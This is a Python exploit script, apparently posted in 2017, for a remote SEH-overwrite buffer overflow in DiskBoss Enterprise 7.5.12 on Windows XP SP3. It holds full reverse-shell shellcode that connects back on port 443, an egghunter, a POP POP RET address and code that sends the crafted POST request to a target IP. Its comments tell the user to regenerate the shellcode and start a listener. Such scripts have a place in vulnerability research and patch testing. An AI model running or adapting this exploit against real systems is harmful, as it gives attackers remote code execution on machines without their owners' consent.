
DiskBoss Enterprise 7.5.12 POST Buffer Overflow (SEH overwrite + egghunter, remote, tested on Windows XP SP3)

Posted on 11 January 2017

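#!/usr/bin/env python3
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3
"""DiskBoss Enterprise 7.5.12 - SEH overwrite via an over-long POST request URI.

Layout of the 5000-byte request-line payload (offsets from the start of the
URI), as fixed by the arithmetic below:

    0      egg tag "ezggezgg" (8)           -- what the egghunter scans for
    8      NOP sled (8) + shellcode + pad   -- 2480 bytes in total
    2488   nSEH: jmp short +0x0f, NOP NOP    (4)
    2492   SEH:  POP POP RET address         (4)
    2496   NOP pad (9)
    2505   32-byte egghunter
    2537   NOP filler up to 5000 bytes

When the overflow corrupts the SEH chain and an exception fires, the handler
pointer is dispatched to POP POP RET, which returns into nSEH; the short jump
skips the handler address and the NOP pad and lands on the egghunter, which
walks memory for the egg and jumps to the shellcode placed after it.

Caveats a user should know before pointing this at a box:
  * The POP POP RET address (0x1002a66b) and the "tested on" note tie this to
    the 7.5.12 build on Windows XP SP3. Other builds/OS versions will need the
    address re-found (and, with DEP/ASLR present, a different technique).
  * The shellcode is a reverse shell to port 443 (per the author's note); it
    is generated, not hand-written, and must be replaced with one built for
    your listener (e.g. msfvenom with the same bad-character list). The
    build_payload() check rejects any byte from BAD_CHARS so a regenerated
    shellcode is validated before it is sent.
  * This file was recovered from a whitespace-mangled listing: the hex escapes
    and the CRLF line endings of the HTTP request have been restored. The
    original "Host" header appeared as "Host: :<ip>"; it is rebuilt from `ip`
    here. Neither header is involved in triggering the overflow.
"""
import socket

# Target. Change to the host running DiskBoss Enterprise (default HTTP port 80).
ip = "192.168.86.150"
port = 80

# Bytes that corrupt the request before it reaches the vulnerable copy
# (NUL, tab, LF, CR, space). Any shellcode/egghunter used here must avoid them.
BAD_CHARS = b"\x00\x09\x0a\x0d\x20"

# The egghunter looks for the 4-byte tag twice in a row, hence "ezgg" * 2.
egg = b"ezggezgg"
nopslide = b"\x90" * 8

# Reverse shell @ port 443 - regenerate for your listener and re-run the
# bad-character check (see build_payload). 351 bytes as shipped.
shellcode = (
    b"\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
    b"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
    b"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
    b"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
    b"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
    b"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
    b"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
    b"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
    b"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
    b"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
    b"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
    b"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
    b"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
    b"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
    b"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
    b"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
    b"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
    b"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
    b"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
    b"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
    b"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
    b"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
    b"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
    b"\x7e\x97\x50\x56\x7e\xb2"
)

# Pad so that nopslide + shellcode + scpad is always 2480 bytes; together with
# the 8-byte egg this puts nSEH at offset 2488 regardless of shellcode size.
scpad = b"\x90" * (2480 - len(shellcode) - len(nopslide))

# nSEH: "jmp short +0x0f". After the 2-byte jmp, 15 bytes forward skips the
# 4-byte SEH address and the 9-byte NOP pad (4 + 9 + 2 = 15 + 2 = 17 bytes from
# the start of nSEH), landing exactly on the egghunter. Two NOPs fill nSEH.
shortjmp = b"\xeb\x0f\x90\x90"

# SEH: address of a POP POP RET sequence, little-endian (0x1002a66b). Module
# specific - re-find for any other DiskBoss build.
seh = b"\x6b\xa6\x02\x10"

extra = b"\x90" * 9

# 32-byte egghunter (int 0x2e syscall based, tag "ezgg" at mov eax,imm32).
# Searches for the tag twice in a row and jumps to the byte after it.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Fill the rest so the URI is exactly 5000 bytes.
pad = b"\x90" * (5000 - len(extra) - 2496 - len(egghunter))


def build_payload() -> bytes:
    """Assemble the 5000-byte request-URI payload and validate it.

    Returns:
        The bytes placed between "POST " and " HTTP/1.1" in the request.

    Raises:
        ValueError: if the assembled payload contains a byte from BAD_CHARS,
            or if it is not exactly 5000 bytes (a replaced shellcode that is
            larger than 2472 bytes would make scpad negative and silently
            shift every offset).
    """
    payload = (egg + nopslide + shellcode + scpad
               + shortjmp + seh + extra + egghunter + pad)
    if len(payload) != 5000:
        raise ValueError(
            "payload is %d bytes, expected 5000 - shellcode too large?"
            % len(payload))
    bad = sorted({b for b in payload if b in BAD_CHARS})
    if bad:
        raise ValueError(
            "payload contains bad character(s): %s"
            % ", ".join("\\x%02x" % b for b in bad))
    return payload


def build_request(host: str = ip) -> bytes:
    """Build the raw HTTP POST request carrying the payload in the URI.

    Args:
        host: value for the Host header; defaults to the module-level `ip`.

    Returns:
        The complete request as bytes, CRLF-terminated with a blank line.
    """
    headers = (
        "Host: " + host + "\r\n"
        "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) "
        "Gecko/20101026 Firefox/3.6.12\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "\r\n"
    )
    return b"POST " + build_payload() + b" HTTP/1.1\r\n" + headers.encode("ascii")


def main() -> None:
    """Send the crafted request to ip:port.

    Uses sendall() so the whole 5 KB request is written even if the kernel
    accepts only part of it on the first call; the socket is closed on exit
    or error. Start your reverse-shell listener first.
    """
    request = build_request()
    with socket.create_connection((ip, port)) as s:
        s.sendall(request)


if __name__ == "__main__":
    main()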

